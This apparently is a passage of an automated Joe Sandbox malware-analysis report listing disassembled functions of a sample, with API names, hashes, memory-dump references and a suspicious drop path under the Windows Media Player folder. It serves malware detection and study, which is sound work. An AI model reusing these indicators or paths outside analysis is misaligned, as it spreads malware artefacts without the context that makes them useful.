                                                                                                                                                                  • API String ID: 3668304517-3825735986
                                                                                                                                                                  • Opcode ID: 3b96ca3ed2c645b18e49e253127e488c662b08a6fc5aa7bde1f60e7d962cfe14
                                                                                                                                                                  • Instruction ID: 363d2b99745a6da6598d7afdc4548c73941f5738dc84c4cd0e74100c8e3dad34
                                                                                                                                                                  • Opcode Fuzzy Hash: 3b96ca3ed2c645b18e49e253127e488c662b08a6fc5aa7bde1f60e7d962cfe14
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E415792E1C6C441E614EA25EC402BCA351EBB57F5F805332FEAD427CADE2CE1819B10
                                                                                                                                                                  Function 00007FF72C9EFDC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Wcrtomb
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2723506260-578493202
                                                                                                                                                                  • Opcode ID: 3b07b4b352d963d4bab63d397427ace7c124bb9023250bb7d6165522fa471f15
                                                                                                                                                                  • Instruction ID: bdb863323e2bc437ff49bc57e8d7d010e139cb5de2b0232343a954d26029b9ea
                                                                                                                                                                  • Opcode Fuzzy Hash: 3b07b4b352d963d4bab63d397427ace7c124bb9023250bb7d6165522fa471f15
                                                                                                                                                                  • Instruction Fuzzy Hash: BA311972608BC685E620AF16E9806AAA364F769B94F848027EBCD43746DF3DE451CB50
                                                                                                                                                                  Function 00007FF72CA07BF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 442123175-578493202
                                                                                                                                                                  • Opcode ID: 0d362f73f0507540c8aa8c674c0382fe51665a0932cdb14482f0c5638c38dc5b
                                                                                                                                                                  • Instruction ID: e90ce7d7cc5011353aaed93e70018b4e59bbd541a0e1d5169fede25ff56a8a59
                                                                                                                                                                  • Opcode Fuzzy Hash: 0d362f73f0507540c8aa8c674c0382fe51665a0932cdb14482f0c5638c38dc5b
                                                                                                                                                                  • Instruction Fuzzy Hash: D731E272B18A4187EB60AF25F884BA9A3B4FB68790F954031EB4D87754EF3CD451CB10
                                                                                                                                                                  Function 00007FF72CA07AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 442123175-578493202
                                                                                                                                                                  • Opcode ID: 9ac25856cd0a3fa183f96c0255de3ba7443cec8f53384d8783c0290be4bdd428
                                                                                                                                                                  • Instruction ID: bf77d2b544dceb9ac02cb9c225ff06a7ff290473277e43a28459ec52d17a7c47
                                                                                                                                                                  • Opcode Fuzzy Hash: 9ac25856cd0a3fa183f96c0255de3ba7443cec8f53384d8783c0290be4bdd428
                                                                                                                                                                  • Instruction Fuzzy Hash: 6831A232A18B818AE750AF25E8806A9A7B0FB69790F844032EA4E83755DF3CD455CB10
                                                                                                                                                                  Function 00007FF72CA10BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2776309574-578493202
                                                                                                                                                                  • Opcode ID: 5c230556a4be5e03a772800516f01d1f220204d4ab5c2eaf56dbd5fa311e33c0
                                                                                                                                                                  • Instruction ID: d46fc0e7f47760428583ac0cdf657f4ec59ccd61e8621f92f11d12cb27c17c41
                                                                                                                                                                  • Opcode Fuzzy Hash: 5c230556a4be5e03a772800516f01d1f220204d4ab5c2eaf56dbd5fa311e33c0
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C31A332608B818AE7609B25F8417AEB7B4F7957A4F940131EA8C47B98CF7CD140CF50
                                                                                                                                                                  Function 00007FF72CA1CF80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                  • API String ID: 729085983-410509341
                                                                                                                                                                  • Opcode ID: 7856f3795aebfd0e8b5d61ff23763f898477f6cc05ae6a465f12707c2bb4ec42
                                                                                                                                                                  • Instruction ID: ea405b38bdb209eb4dd41b4d2f6efca233e26a238cbca25c072d48c38cdb2bcc
                                                                                                                                                                  • Opcode Fuzzy Hash: 7856f3795aebfd0e8b5d61ff23763f898477f6cc05ae6a465f12707c2bb4ec42
                                                                                                                                                                  • Instruction Fuzzy Hash: 7111C262A0AB0985EB04BF25E8447AC73A0EF64BB8F804631D95C073DADE7CE480D750
                                                                                                                                                                  Function 00007FF72C9B2C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 1838369231-1405518554
                                                                                                                                                                  • Opcode ID: 32b7ae8dc5c7a4dabcb2d6b565ab7b2f9c6359523e4baa40e4bebb780e0dcbca
                                                                                                                                                                  • Instruction ID: 13c83f841ccfad44e3dd638ccd3ed0515a7b038fff3eb27e4a8e431a4f6f66e0
                                                                                                                                                                  • Opcode Fuzzy Hash: 32b7ae8dc5c7a4dabcb2d6b565ab7b2f9c6359523e4baa40e4bebb780e0dcbca
                                                                                                                                                                  • Instruction Fuzzy Hash: 4801622350ABC18AC744EF75A840159B7B5FB78B98B585139DA8D8371AEF38C590C750
                                                                                                                                                                  Function 00007FF72C9F49C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72C9EEEE6), ref: 00007FF72C9F4A10
                                                                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72C9EEEE6), ref: 00007FF72C9F4A51
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                  • Opcode ID: 3a651beb4bf27f5407259cea30834cbdef90a895a548db86fc01e64e268f21f8
                                                                                                                                                                  • Instruction ID: f123a9687731b2b6194f3bfe1d3426a0c7f09417624411ac96e7de4bafac4db2
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a651beb4bf27f5407259cea30834cbdef90a895a548db86fc01e64e268f21f8
                                                                                                                                                                  • Instruction Fuzzy Hash: 86115E32618B8182EB619F15F840269B7E5FB98BA4F588230DECC17758EF3CC5518B10
                                                                                                                                                                  Function 00007FF72CA1BC33 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                  • API String ID: 729085983-410509341
                                                                                                                                                                  • Opcode ID: 3a77e4a1c4750c989717916d7749886f1baedb1c4842d737a8bb0566699bff25
                                                                                                                                                                  • Instruction ID: 721fe3fe45f593925bde06e7fb056bd0d29bb83a9dc3689d69d33bfea6b1adc0
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a77e4a1c4750c989717916d7749886f1baedb1c4842d737a8bb0566699bff25
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C11C2B2A16B8685EB15AB24F8443EC73A1EB64BB4F804231C96C0B7D5DF7CE540C790
                                                                                                                                                                  Function 00007FF72C9D2BC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __std_fs_code_page.LIBCPMT ref: 00007FF72C9D2BDE
                                                                                                                                                                    • Part of subcall function 00007FF72C9EE0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF72C9B3F96), ref: 00007FF72C9EE0C6
                                                                                                                                                                    • Part of subcall function 00007FF72C9B3AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF72C9B3B25
                                                                                                                                                                    • Part of subcall function 00007FF72C9B3AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF72C9B3BCA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_fs_convert_narrow_to_wide$ApisFile__std_fs_code_page
                                                                                                                                                                  • String ID: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip$J
                                                                                                                                                                  • API String ID: 1377543553-1822051254
                                                                                                                                                                  • Opcode ID: 562919172af5b9e87f5682eb6a0a24944c2d8dc34fa2571c2ff8a2ccba6cf4ea
                                                                                                                                                                  • Instruction ID: ce28b253401d4a6c1c9a97d34a6a26099b2b1a288bdba40bcb8c1e54ce144262
                                                                                                                                                                  • Opcode Fuzzy Hash: 562919172af5b9e87f5682eb6a0a24944c2d8dc34fa2571c2ff8a2ccba6cf4ea
                                                                                                                                                                  • Instruction Fuzzy Hash: 61E04F55A187C682EA20EB14B8013A9E364FBAD328F540231EECC16755EF3CD2858B54
                                                                                                                                                                  Function 00007FF72C9D2C10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __std_fs_code_page.LIBCPMT ref: 00007FF72C9D2C2E
                                                                                                                                                                    • Part of subcall function 00007FF72C9EE0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF72C9B3F96), ref: 00007FF72C9EE0C6
                                                                                                                                                                    • Part of subcall function 00007FF72C9B3AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF72C9B3B25
                                                                                                                                                                    • Part of subcall function 00007FF72C9B3AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF72C9B3BCA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_fs_convert_narrow_to_wide$ApisFile__std_fs_code_page
                                                                                                                                                                  • String ID: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$G
                                                                                                                                                                  • API String ID: 1377543553-4099582714
                                                                                                                                                                  • Opcode ID: c8c0632f238214065625dfbc26c946da351fe81e8c674869c76d141565dec898
                                                                                                                                                                  • Instruction ID: 090fa5b4ba156789c235ff37a1bd3b93552209e60866f5b4ed40472aab54d3f6
                                                                                                                                                                  • Opcode Fuzzy Hash: c8c0632f238214065625dfbc26c946da351fe81e8c674869c76d141565dec898
                                                                                                                                                                  • Instruction Fuzzy Hash: 2CE04F65A187C682EA20EB14B8013A9E364FBAC328F540231EFCC16755EF3CD2858B54